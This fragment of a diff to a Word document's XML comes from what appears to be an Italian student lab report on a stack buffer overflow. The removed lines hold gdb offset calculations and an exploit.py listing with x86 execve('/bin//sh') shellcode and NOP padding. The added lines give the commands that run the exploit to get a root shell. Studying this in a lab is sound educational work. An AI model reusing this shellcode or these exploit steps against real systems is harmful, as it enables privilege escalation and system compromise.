+              </w:rPr>
+              <w:t xml:space="preserve">’) as f: </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
@@ -7644,21 +8636,23 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>$3 = 108 (</w:t>
+              <w:t xml:space="preserve">        </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>gdb</w:t>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>f.write</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>) quit</w:t>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>(content)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7669,109 +8663,12 @@
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
           <w:kern w:val="3"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>Da</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">i risultati riportati qui sopra, si può vedere che il valore del frame pointer è </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>0xbfffeaf8</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e l’indirizzo del buffer è </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>0xbfffea8c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Andando a calcolare la distanza tra questi due valori si ottiene 108, e dato che il campo per il </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>return</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>address</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> è 4 bytes avanti rispetto l’</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>ebp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> pointer, la distanza sarà 112.</w:t>
-      </w:r>
+          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7780,7 +8677,7 @@
           <w:b/>
           <w:kern w:val="3"/>
           <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
       </w:pPr>
@@ -7790,7 +8687,7 @@
           <w:b/>
           <w:kern w:val="3"/>
           <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
         <w:br w:type="page"/>
@@ -7804,7 +8701,7 @@
           <w:b/>
           <w:kern w:val="3"/>
           <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
       </w:pPr>
@@ -7814,11 +8711,11 @@
           <w:b/>
           <w:kern w:val="3"/>
           <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">e) </w:t>
+        <w:t xml:space="preserve">f) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7826,10 +8723,10 @@
           <w:b/>
           <w:kern w:val="3"/>
           <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>Generare l’input malizioso</w:t>
+        <w:t>Eseguire il programma vulnerabile</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7839,7 +8736,7 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:kern w:val="3"/>
           <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
       </w:pPr>
@@ -7848,67 +8745,143 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:kern w:val="3"/>
           <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">A questo punto si può passare a creare il contenuto per il </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">A questo punto si può quindi eseguire lo script </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
           <w:kern w:val="3"/>
           <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
+        <w:t xml:space="preserve">exploit.py </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">per andare a generare </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">il nuovo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
         <w:t>badfile</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
           <w:kern w:val="3"/>
           <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>. Di seguito è riportato il codice Python che si può utilizzare per scrivere il contenuto del file, dato che sarà in binario e quindi difficilmente implementabile a mano.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Input malizioso</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exploit.py</w:t>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">Come prima cosa è necessario dare i permessi di esecuzione allo script, dopo di che si elimina il vecchio </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e si eseguire lo script Python.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ora tutto è pronto per eseguire il programma C contente l’attacco di tipo BO che, se correttamente implementato, dovrebbe aprire una shell di </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>comand</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ROOT, permettendo all’attaccante innumerevoli azioni malevoli sul computer ospite.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -7948,36 +8921,35 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>#! /</w:t>
+              <w:t xml:space="preserve">$ </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>usr</w:t>
+              <w:t>chmod</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>/bin/python3</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>import sys</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>u+x</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> exploit.py </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8001,7 +8973,21 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve">shellcode= ( </w:t>
+              <w:t xml:space="preserve">$ rm </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>badfile</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8016,192 +9002,7 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve">        "\x31\xc0" </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">        "\x50" </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t xml:space="preserve">        "\x68" "//</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>sh</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">" </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t xml:space="preserve">        "\x68" "/bin"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">        "\x89\xe3" </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">        "\x50" </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">        "\x53"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">        "\x89\xe1"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">        "\x99" </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">        "\xb0\x0b"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">        "\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>xcd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>\x80"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>).encode</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(’latin-1’) </w:t>
+              <w:t xml:space="preserve">$ exploit.py </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8221,319 +9022,19 @@
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t># Fill the content with NOPs</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">content = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>bytearray</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>(</w:t>
+              <w:t>$ .</w:t>
             </w:r>
             <w:proofErr w:type="gramEnd"/>
             <w:r>
